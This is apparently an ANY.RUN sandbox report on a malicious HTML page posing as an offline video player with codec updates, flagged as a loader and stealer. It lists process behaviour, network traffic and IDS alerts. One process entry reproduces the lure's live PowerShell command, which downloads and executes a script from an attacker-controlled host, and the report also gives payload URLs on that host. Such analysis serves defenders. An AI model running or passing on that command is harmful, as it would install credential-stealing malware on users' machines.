File name:

Offline Player + Update Codecs.html

Full analysis: https://app.any.run/tasks/4300d4df-5d18-4e3b-a6a6-985880f761b7
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 08, 2025, 17:40:21
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
stealer
arch-scr
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with CRLF line terminators
MD5:

DA46AE7BAC64B71126973D8069D19FBD

SHA1:

439C28B6E802A04961A90260B75599923B11824D

SHA256:

A76924CDC8996C80C2352700767172720A12890466AE2A0DB850CF9FA6EF5724

SSDEEP:

12:hPEhk4NLfTU7fMStWwJL2IjDRRFERoMWPGu:hPGN6EStFScRR+oMK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Probably downloads file via BitsAdmin (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)

    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)

    • Gets TEMP folder path (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 1764)
      • wscript.exe (PID: 744)

    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 2800)

    • Opens a text file (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)

    • Actions looks like stealing of personal data

      • wscript.exe (PID: 2800)

  • SUSPICIOUS

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)

    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)

    • Application launched itself

      • powershell.exe (PID: 780)

    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 780)

    • Probably download files using WebClient

      • powershell.exe (PID: 780)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 780)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)

    • Likely accesses (executes) a file from the Public directory

      • ntdlg.exe (PID: 1012)
      • wscript.exe (PID: 2800)
      • ntdlg.exe (PID: 5204)
      • wscript.exe (PID: 7172)
      • notepad++.exe (PID: 4620)
      • wscript.exe (PID: 7360)
      • ntdlg.exe (PID: 1056)
      • ntdlg.exe (PID: 7972)
      • ntdlg.exe (PID: 5188)
      • ntdlg.exe (PID: 7104)
      • ntdlg.exe (PID: 6468)
      • notepad.exe (PID: 7372)
      • ntdlg.exe (PID: 2780)
      • ntdlg.exe (PID: 7804)
      • ntdlg.exe (PID: 1812)
      • wscript.exe (PID: 4304)
      • ntdlg.exe (PID: 1128)
      • wscript.exe (PID: 4696)
      • ntdlg.exe (PID: 7400)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
      • ntdlg.exe (PID: 4380)
      • ntdlg.exe (PID: 6004)
      • ntdlg.exe (PID: 2692)
      • ntdlg.exe (PID: 5212)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 4188)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4188)

    • The process executes JS scripts

      • powershell.exe (PID: 4188)

    • Connects to unusual port

      • ntdlg.exe (PID: 1012)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)

    • Checks whether a specific file exists (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)

    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 2800)

    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)

    • Creates file in the systems drive root

      • wscript.exe (PID: 2800)

    • Accesses current user name via WMI (SCRIPT)

      • wscript.exe (PID: 2800)

  • INFO

    • Reads the computer name

      • identity_helper.exe (PID: 1628)
      • ntdlg.exe (PID: 1012)

    • Checks supported languages

      • identity_helper.exe (PID: 1628)
      • ntdlg.exe (PID: 1012)
      • curl.exe (PID: 6808)
      • ntdlg.exe (PID: 5204)
      • ntdlg.exe (PID: 1056)
      • ntdlg.exe (PID: 7972)
      • ntdlg.exe (PID: 5188)
      • curl.exe (PID: 6436)
      • ntdlg.exe (PID: 7104)
      • curl.exe (PID: 3976)
      • ntdlg.exe (PID: 6468)
      • ntdlg.exe (PID: 2780)
      • ntdlg.exe (PID: 1812)
      • ntdlg.exe (PID: 7804)
      • ntdlg.exe (PID: 1128)
      • ntdlg.exe (PID: 7400)
      • ntdlg.exe (PID: 2692)
      • ntdlg.exe (PID: 4380)
      • ntdlg.exe (PID: 6004)
      • ntdlg.exe (PID: 5212)
      • curl.exe (PID: 5488)
      • curl.exe (PID: 5972)
      • curl.exe (PID: 6480)
      • curl.exe (PID: 6572)

    • Manual execution by a user

      • powershell.exe (PID: 780)
      • ntdlg.exe (PID: 5204)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • ntdlg.exe (PID: 5188)
      • notepad++.exe (PID: 4620)
      • ntdlg.exe (PID: 7104)
      • ntdlg.exe (PID: 6468)
      • Taskmgr.exe (PID: 5256)
      • Taskmgr.exe (PID: 7156)
      • ntdlg.exe (PID: 1812)
      • ntdlg.exe (PID: 7804)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • ntdlg.exe (PID: 2780)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
      • ntdlg.exe (PID: 2692)
      • ntdlg.exe (PID: 5212)

    • Application launched itself

      • msedge.exe (PID: 7436)

    • Disables trace logs

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)

    • Reads Environment values

      • identity_helper.exe (PID: 1628)

    • Checks proxy server information

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)
      • slui.exe (PID: 1128)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4188)

    • Reads the machine GUID from the registry

      • ntdlg.exe (PID: 1012)
      • ntdlg.exe (PID: 1056)
      • ntdlg.exe (PID: 7972)
      • ntdlg.exe (PID: 5204)
      • ntdlg.exe (PID: 5188)
      • ntdlg.exe (PID: 6468)
      • ntdlg.exe (PID: 7104)
      • ntdlg.exe (PID: 2780)
      • ntdlg.exe (PID: 1812)
      • ntdlg.exe (PID: 7804)
      • ntdlg.exe (PID: 1128)
      • ntdlg.exe (PID: 7400)
      • ntdlg.exe (PID: 4380)
      • ntdlg.exe (PID: 6004)
      • ntdlg.exe (PID: 2692)
      • ntdlg.exe (PID: 5212)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4188)

    • Execution of CURL command

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)

    • Creates files or folders in the user directory

      • ntdlg.exe (PID: 1012)

    • Create files in a temporary directory

      • curl.exe (PID: 6808)
      • curl.exe (PID: 6436)
      • curl.exe (PID: 3976)
      • curl.exe (PID: 6572)

    • Reads Internet Explorer settings

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)

    • Reads the software policy settings

      • slui.exe (PID: 7660)
      • slui.exe (PID: 1128)

    • Executable content was dropped or overwritten

      • msedge.exe (PID: 3176)

    • The sample compiled with english language support

      • msedge.exe (PID: 3176)

    • Reads security settings of Internet Explorer

      • Taskmgr.exe (PID: 7156)
      • OpenWith.exe (PID: 6564)
      • notepad.exe (PID: 7372)

    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 6564)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)

EXIF

HTML

Title: Offline X-MPEG Player
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
247
Monitored processes
107
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs sppextcomobj.exe no specs slui.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs wscript.exe ntdlg.exe conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs curl.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs slui.exe rundll32.exe no specs msedge.exe no specs ntdlg.exe no specs conhost.exe no specs notepad++.exe no specs msedge.exe no specs msedge.exe wscript.exe no specs ntdlg.exe no specs conhost.exe no specs wscript.exe no specs ntdlg.exe no specs conhost.exe no specs ntdlg.exe no specs conhost.exe no specs msedge.exe no specs curl.exe no specs conhost.exe no specs ntdlg.exe curl.exe no specs conhost.exe no specs conhost.exe no specs ntdlg.exe conhost.exe no specs taskmgr.exe no specs taskmgr.exe msedge.exe no specs openwith.exe no specs notepad.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs ntdlg.exe no specs conhost.exe no specs ntdlg.exe no specs conhost.exe no specs msedge.exe no specs ntdlg.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs wscript.exe no specs ntdlg.exe no specs conhost.exe no specs wscript.exe no specs ntdlg.exe no specs conhost.exe no specs wscript.exe no specs wscript.exe no specs ntdlg.exe no specs conhost.exe no specs ntdlg.exe no specs conhost.exe no specs ntdlg.exe no specs conhost.exe no specs msedge.exe no specs ntdlg.exe no specs conhost.exe no specs curl.exe no specs conhost.exe no specs curl.exe no specs conhost.exe no specs msedge.exe no specs curl.exe no specs conhost.exe no specs curl.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
744"C:\Windows\System32\WScript.exe" "C:\Users\Public\Controller\ntdlg.js" C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
780"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://turistojoy43-001-site1.atempurl.com/system_t01.js')" # Download XMPEG-Codec 0.2.33 AUTOUpdateC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
856\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exentdlg.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1012"C:\Users\Public\Controller\ntdlg.exe" C:\Users\Public\Controller\ntdlg.exe
wscript.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\public\controller\ntdlg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
1056"C:\Users\Public\Controller\ntdlg.exe" C:\Users\Public\Controller\ntdlg.exewscript.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\public\controller\ntdlg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
1128C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1128"C:\Users\Public\Controller\ntdlg.exe" C:\Users\Public\Controller\ntdlg.exewscript.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\public\controller\ntdlg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
1188"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5692 --field-trial-handle=2364,i,18262556210716992653,65211040996942764,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1244"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6372 --field-trial-handle=2364,i,18262556210716992653,65211040996942764,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1272"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5228 --field-trial-handle=2364,i,18262556210716992653,65211040996942764,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
40 050
Read events
40 024
Write events
25
Delete events
1

Modification events

(PID) Process:(7436) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
6E13AB21DE902F00
(PID) Process:(7436) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\525034
Operation:writeName:WindowTabManagerFileMappingId
Value:
{2F624D8E-4987-4622-9096-CCD3BF0808D7}
(PID) Process:(7436) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(7436) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(7436) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(7436) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(7436) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
D2BFA221DE902F00
(PID) Process:(7436) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\525034
Operation:writeName:WindowTabManagerFileMappingId
Value:
{BF59393B-61CE-4A20-8963-FC59DAAB0232}
(PID) Process:(7436) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
368C0322DE902F00
(PID) Process:(7436) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:MicrosoftEdgeAutoLaunch_29EBC4579851B72EE312C449CF839B1A
Value:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
Executable files
36
Suspicious files
753
Text files
161
Unknown types
0

Dropped files

PID
Process
Filename
Type
7436msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF10b7c9.TMP
MD5:
SHA256:
7436msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
7436msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF10b7c9.TMP
MD5:
SHA256:
7436msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF10b7c9.TMP
MD5:
SHA256:
7436msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
7436msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
7436msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF10b7d8.TMP
MD5:
SHA256:
7436msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
7436msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF10b7f7.TMP
MD5:
SHA256:
7436msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
49
TCP/UDP connections
89
DNS requests
92
Threats
13

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7748
msedge.exe
GET
200
45.58.159.53:80
http://turistojoy43-001-site1.atempurl.com/player/loader.php
unknown
GET
200
2.22.242.90:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2924
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
2924
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
780
powershell.exe
GET
200
45.58.159.53:80
http://turistojoy43-001-site1.atempurl.com/system_t01.js
unknown
5072
svchost.exe
HEAD
200
45.58.159.53:80
http://turistojoy43-001-site1.atempurl.com/ntdlg_t01.zip
unknown
4188
powershell.exe
GET
200
45.58.159.53:80
http://turistojoy43-001-site1.atempurl.com/system_t01.js
unknown
5332
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5072
svchost.exe
GET
200
45.58.159.53:80
http://turistojoy43-001-site1.atempurl.com/ntdlg_t01.zip
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2.22.242.90:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
7748
msedge.exe
13.107.42.16:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7436
msedge.exe
239.255.255.250:1900
whitelisted
7748
msedge.exe
150.171.28.11:443
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7748
msedge.exe
13.107.6.158:443
business.bing.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7748
msedge.exe
13.107.253.45:443
edge-mobile-static.azureedge.net
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7748
msedge.exe
45.58.159.53:80
turistojoy43-001-site1.atempurl.com
ST-BGP
US
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 2.22.242.90
  • 2.22.242.121
whitelisted
google.com
  • 172.217.18.14
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 150.171.28.11
  • 150.171.27.11
whitelisted
business.bing.com
  • 13.107.6.158
whitelisted
edge-mobile-static.azureedge.net
  • 13.107.253.45
whitelisted
turistojoy43-001-site1.atempurl.com
  • 45.58.159.53
unknown
bzib.nelreports.net
  • 2.19.126.145
  • 2.19.126.152
whitelisted
update.googleapis.com
  • 142.250.185.131
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 218
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 223
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 325
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 272
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Check Security.Principal.WindowsBuiltInRole has been detected
Misc activity
SUSPICIOUS [ANY.RUN] The Principal.WindowsIdentity in PS.Script has been detected
Potentially Bad Traffic
ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 218
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Check Security.Principal.WindowsBuiltInRole has been detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Offline Player + Update Codecs.html